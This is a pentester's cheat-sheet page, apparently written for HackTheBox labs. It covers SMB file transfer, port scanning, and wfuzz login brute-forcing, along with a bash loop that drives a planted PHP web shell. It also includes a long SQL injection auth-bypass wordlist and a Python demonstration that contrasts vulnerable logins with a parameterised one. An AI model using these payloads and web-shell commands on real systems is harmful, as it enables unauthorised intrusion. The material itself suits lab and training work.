Miscellaneous
Here I’ll show some examples of miscellaneous tools and commands that I commonly use.
File Transfer
Commands used to transfer files between boxes.
Windows File Transfer
You can transfer files by starting an SMB share with impacket on the Kali box and mapping it from PowerShell on the Windows box; after that you can copy files in both directions. Using a username and password matters: current Windows builds refuse unauthenticated (guest) access to SMB shares by default.
On Windows Box
$pass = convertto-securestring '123456' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('0x4rt3mis', $pass)
On Kali Box we start the impacket SMB server (-smb2support is needed because modern Windows no longer speaks SMB1)
impacket-smbserver kalishare . -username 0x4rt3mis -password 123456 -smb2support
Now we map the share on Windows
New-PSDrive kalishare -PSProvider FileSystem -Credential $cred -Root \\10.10.16.5\kalishare
Or
net use \\10.10.16.5\kalishare /u:0x4rt3mis 123456
cp archive.zip \\10.10.16.5\kalishare
Commands
Let’s jump in.
PowerShell
Get the size of folders
Get-ChildItem -Recurse 'C:\inetpub\wwwroot' | Measure-Object -Property Length -Sum
Zip Folder
Compress-Archive -Path .\htdocs -DestinationPath archive.zip
Port Scan
# replace "ip" with the target; TcpClient.Connect throws on a closed port and 2>$null hides that error
8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("ip",$_)) "Port $_ is open!"} 2>$null
Gobuster
gobuster dir -u http://x.x.x.x -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30
Wfuzz
Login Bypass
wfuzz -z file,list.txt -d "username=adminFUZZ&password=admin" --hc 200 http://10.10.10.185/login.php
Vhost Fuzzing
wfuzz -u http://10.10.10.208 -H "Host: FUZZ.crossfit.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 10701
Password Bruteforce
wfuzz -c -z file,common.txt --hh 18170 -d "Action=Login&RequestedURL=Action%3DAdmin&Lang=en&TimeOffset=240&User=root@localhost&Password=FUZZ" http://192.168.8.9/admin.php
Bash Misc
Find
find . -type f -newermt 2018-12-19 ! -newermt 2018-12-21 -ls
Grep Awesome
grep -l -R -e "\$_GET\['doc'\]" $(grep -l -R -e "\$_GET\['app'\]" `grep -l -R -e vqmods`)
Small ssh key
ssh-keygen -t ed25519 -f 0x4rt3mis
Pseudo WebShell PHP
#!/bin/bash
# 0x4rt3mis
# "Pseudo" shell - compromised HackTheBox machine
# Wraps a PHP web shell that executes whatever arrives in the "cmd" GET parameter
echo "exit for exit"
while true
do
    read -r -p "> " input
    [ "$input" = "exit" ] && break
    # -G sends --data-urlencode as a URL-encoded GET parameter ("-GET" is parsed by curl as -G -E T)
    curl -s -G http://10.10.10.207/shop/vqmod/xml/payload.php --data-urlencode "cmd=$input"
done
Python Virtual Env
virtualenv -p python2.7 exploit
cd exploit
source bin/activate
Wordlist Auth Bypass
" "
" #
" --
"&"
"*"
"-"
"/*
"^"
'
' #
' '
' -
' --
'#
'&'
'*'
'-'
'--
'/*
'^'
=
==
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1') and '1'='1-
admin" #
admin" --
admin"/*
admin' #
admin' --
admin'/*
admin' and substring(password/text(),1,1)='7
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1-
' and 1='1
' and a='a
' and 'one'='one
' and 'one'='one-
' and substring(password/text(),1,1)='7
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
or 0=0 #
or 0=0 -
or 0=0 --
" or 0=0 #
" or 0=0 -
" or 0=0 --
%' or '0'='0
' or 0=0 #
' or 0=0 #
' or 0=0 -
' or 0=0 --
or 1=1
or 1=1#
or 1=1-
or 1=1--
or 1=1/*
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 -
" or 1=1 --
" or 1=1#
" or 1=1-
" or 1=1--
" or 1=1/*
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1'='1
' or 1=1
' or 1=1 -
' or 1=1 --
' or 1=1#
' or 1=1-
' or 1=1--
' or 1=1/*
' or 1=1;#
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1?
) or '1'='1-
) or ('1'='1-
or 1=1
or 1=1#
or 1=1--
or 1=1/*
'OR 1=1--
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
" or "a"="a
") or ("a"="a
' or 'a'='a
' or a=a-
' or a=a--
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
'OR '' = ' Allows authentication without a valid username.
'=' 'or' and '=' 'or'
' or 'one'='one
' or 'one'='one-
or true
" or true--
") or true--
' or true--
') or true--
or true--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
' UNION select table_schema,table_name FROM information_Schema.tables;#
<username>'--
<username>' OR 1=1--
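As an added example (not part of the original post), the following Python script shows why the entries in this wordlist look the way they do and why the wfuzz login bypass above puts FUZZ right after "admin". It builds a throwaway SQLite database with a constructed users table (the table layout and the account are assumptions) and runs three payloads from the list against two vulnerable login styles and a parameterised one: the tautology `admin' or '1'='1'--`, the MySQL-only comment `admin' #` (SQLite rejects it, which is why the list carries `#`, `--` and `/*` variants of the same trick), and the `1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055` entry, whose hash is md5("1234"), so it works with password 1234 against an application that fetches the row and compares the hash in code, where a plain tautology fails.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample data: one account whose password is stored as an unsalted
# MD5 hex digest, the way many legacy PHP login pages store it (assumption).
USERS = [("admin", "S3cr3t!")]


def md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(u, md5(p)) for u, p in USERS])
    con.commit()
    return con


def login_inline_compare(con, username: str, password: str):
    """Vulnerable style 1: username and password hash are both checked in SQL,
    with the username concatenated straight into the query string."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, md5(password)))
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error:
        return None  # broken query -> no login (and a response wfuzz can tell apart)
    return row[0] if row else None


def login_fetch_then_compare(con, username: str, password: str):
    """Vulnerable style 2: SQL only looks the row up; the hash is compared in code.
    A tautology no longer helps, but a UNION can inject a row with a known hash."""
    query = "SELECT username, password FROM users WHERE username = '%s'" % username
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error:
        return None
    if row is None:
        return None
    user, stored_hash = row
    return user if stored_hash == md5(password) else None


def login_safe(con, username: str, password: str):
    """Fixed version: parameterised query, so quotes and comment markers stay data."""
    row = con.execute("SELECT username, password FROM users WHERE username = ?",
                      (username,)).fetchone()
    if row is None:
        return None
    user, stored_hash = row
    return user if hmac.compare_digest(stored_hash, md5(password)) else None


# Payloads copied from the wordlist above (the "admin" prefix is the fixed part of the wfuzz POST body).
TAUTOLOGY = "admin' or '1'='1'--"
MYSQL_ONLY = "admin' #"  # '#' starts a comment in MySQL only; SQLite raises a syntax error
UNION_MD5_1234 = "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055"


def bypass_matrix(con) -> dict:
    """Which payload logs in as whom against which login style (None = rejected)."""
    return {
        "inline/tautology": login_inline_compare(con, TAUTOLOGY, "wrong"),
        "inline/mysql-comment": login_inline_compare(con, MYSQL_ONLY, "wrong"),
        "fetch/tautology": login_fetch_then_compare(con, TAUTOLOGY, "wrong"),
        "fetch/union-md5(1234)": login_fetch_then_compare(con, UNION_MD5_1234, "1234"),
        "safe/tautology": login_safe(con, TAUTOLOGY, "wrong"),
        "safe/union-md5(1234)": login_safe(con, UNION_MD5_1234, "1234"),
        "safe/real-creds": login_safe(con, "admin", "S3cr3t!"),
    }


if __name__ == "__main__":
    for case, who in bypass_matrix(build_db()).items():
        print(f"{case:24} -> {who}")
```

The matrix is the practical lesson behind fuzzing with the whole list rather than one favourite payload: the comment syntax, the quoting context (`'`, `"`, `')`) and where the password is checked all decide which entry lands, and only the parameterised lookup rejects every one of them.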
Apt Proxy
Useful when a pivoted Linux box has no route to the internet but can reach the Kali box. On Kali, open a SOCKS proxy that also accepts connections from other hosts (-g), then point apt on the target at it (replace server with the Kali IP; socks5h:// proxies need apt 1.5 or newer). Writing a drop-in under apt.conf.d avoids clobbering an existing apt.conf.
ssh -g -D 8000 kali@127.0.0.1
echo "Acquire::http::proxy \"socks5h://server:8000\";" > /etc/apt/apt.conf.d/99proxy